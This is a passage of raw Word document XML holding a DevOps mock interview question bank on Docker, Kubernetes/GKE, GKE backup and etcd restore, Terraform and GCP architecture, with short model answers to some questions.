          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Datadog: Have you used Datadog, and how would you use it for metrics, logs, traces, dashboards, and alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Cloud Functions latency: A newly created Cloud Function had high latency for a few minutes and then automatically recovered. What could be the reason?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. GCP cost optimization: How would you reduce the cost of a GCP environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Docker experience: Have you worked on Docker? Explain the workflows and production concerns you handled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Dockerfiles: Have you written Dockerfiles? What best practices do you follow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Docker build context: What is Docker build context, and why does it matter for build speed, security, and image contents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 15 - Docker Fundamentals Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Docker fundamentals: What is Docker, and what problem does it solve?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Dockerfile fundamentals: What is a Dockerfile, and how is it used to build an image?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Docker CMD vs ENTRYPOINT: What is the difference between CMD and ENTRYPOINT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Docker image optimization: How do you optimize Docker image size?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Docker multi-stage builds: What are multi-stage builds, and when would you use them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Docker image security: How do you secure Docker images before deploying them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 16 - Kubernetes and GKE Fundamentals Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Kubernetes architecture: Explain the architecture of Kubernetes, including control plane and worker-node components.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Kubernetes workload objects: What are Pods, Deployments, ReplicaSets, StatefulSets, and DaemonSets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. StatefulSet vs Deployment: What is the difference between StatefulSet and Deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Kubernetes Service types: What is a Service, and how do ClusterIP, NodePort, and LoadBalancer differ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Kubernetes ConfigMaps and Secrets: What are ConfigMaps and Secrets, and when would you use each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Kubernetes Ingress: How does Ingress work, and what components are involved?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Kubernetes rolling updates: How do you perform rolling updates and rollbacks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Kubernetes probes: How do liveness and readiness probes work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 17 - GKE Troubleshooting and Reliability Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. CrashLoopBackOff: A pod is continuously restarting. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Pending pods: How do you troubleshoot Pending pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Kubernetes node failure: What happens when a node fails, and how do workloads recover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. GKE Cluster Autoscaler: How does Cluster Autoscaler work in GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. GKE cluster upgrade: How do you upgrade a GKE cluster safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Highly available GKE: How would you design a highly available GKE architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Production Kubernetes security: How would you secure a production Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Disaster recovery: How would you implement disaster recovery for a production platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</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spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. In GKE, can you take a direct etcd backup like a self-managed Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In standard managed GKE, Google manages the control plane, including etcd, so you do not SSH into control-plane nodes or run direct etcdctl snapshots yourself. For backup and recovery, focus on backing up Kubernetes resources, persistent volumes, cluster configuration, GitOps/IaC state, and application data. Use Backup for GKE or tools like Velero/Kasten where appropriate, and keep Terraform/Git as the source of truth for cluster and workload configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you design backup and restore for a production GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by separating what must be recovered: cluster configuration, Kubernetes manifests, secrets, persistent volumes, databases, object storage, and external dependencies. Keep infrastructure in Terraform, workloads in GitOps, secrets in Secret Manager or a controlled secret workflow, and use Backup for GKE or Velero/Kasten for Kubernetes resources and persistent volumes. Define RTO/RPO, backup frequency, retention, encryption, cross-region storage, restore ownership, and run regular restore drills into an isolated cluster or namespace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What is Backup for GKE, and what problem does it solve?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Backup for GKE is Google Cloud's managed backup service for GKE workloads. It helps protect Kubernetes resources and persistent volume data, supports backup plans and restore plans, and reduces the need to build a custom backup controller stack. It is useful for restoring deleted namespaces, workloads, configuration, and stateful workload volumes, but it should still be tested with real restore drills and paired with application-aware database backups where needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Scenario: A namespace with production workloads is accidentally deleted in GKE. How would you recover it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First stop any automation that might keep deleting or overwriting resources, then assess whether the namespace was managed by GitOps, Terraform, Helm, or a backup tool. Restore manifests from GitOps or Helm history where possible, restore Kubernetes resources and persistent volume data from Backup for GKE or your backup platform, and validate secrets/config maps, service accounts, ingress, network policies, and PVC bindings. After recovery, add guardrails such as RBAC restrictions, deletion protection, policy checks, and a break-glass approval flow for high-risk deletes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How do you test whether a GKE backup is actually restorable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run scheduled restore drills, not only backup-success checks. Restore into a non-production namespace or temporary cluster, verify Kubernetes objects are recreated, PVC data is mounted, Pods become Ready, services route correctly, secrets and service accounts work, and application-level validation passes. Measure actual recovery time and data loss against RTO/RPO, document gaps, and automate the restore test where possible so backup quality is continuously proven.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How do you take and restore an etcd snapshot in self-managed Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/etcd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For self-managed clusters where you operate etcd, use etcdctl snapshot save with the correct endpoints, CA, cert, and key, then verify it with etcdctl snapshot status. Store snapshots encrypted and off-cluster. To restore, stop the API server/control-plane components, restore the snapshot with etcdctl snapshot restore into a new data directory, update etcd configuration if member names or peer URLs changed, restart etcd and the API server, then validate cluster state and controller health. Always rehearse this in a test cluster before relying on it in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 18 - Terraform Fundamentals Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Terraform state basics: Explain Terraform state and why it is important.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Terraform remote state: What is remote state, and why do teams use it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Terraform state locking: How do you handle state locking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Terraform count vs for_each: What is the difference between count and for_each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Terraform modules: What are modules, and how do you use them for reusable infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Terraform environments: How do you manage multiple environments such as dev, staging, and production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Terraform import: How do you import existing resources into Terraform safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Terraform lifecycle block: What is the Terraform lifecycle block, and when would you use it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Terraform secrets: How do you handle secrets in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Avoid embedding raw secret values in Terraform variables where possible - reference secrets already stored in Secret Manager and grant resources access to fetch them at runtime instead. Mark any genuinely necessary sensitive variables/outputs with `sensitive = true` to redact them from CLI output, store state in an encrypted remote backend with tightly restricted access (state still contains plaintext values), and never commit .tfvars files containing secrets to version control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Terraform cost optimization: How do you reduce infrastructure cost using Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 19 - GCP Architecture and IAM Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. GCP project architecture: Describe a GCP project architecture you have implemented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Shared VPC: Explain Shared VPC and when you would use host and service projects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Hub-and-spoke architecture: Explain hub-and-spoke architecture in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
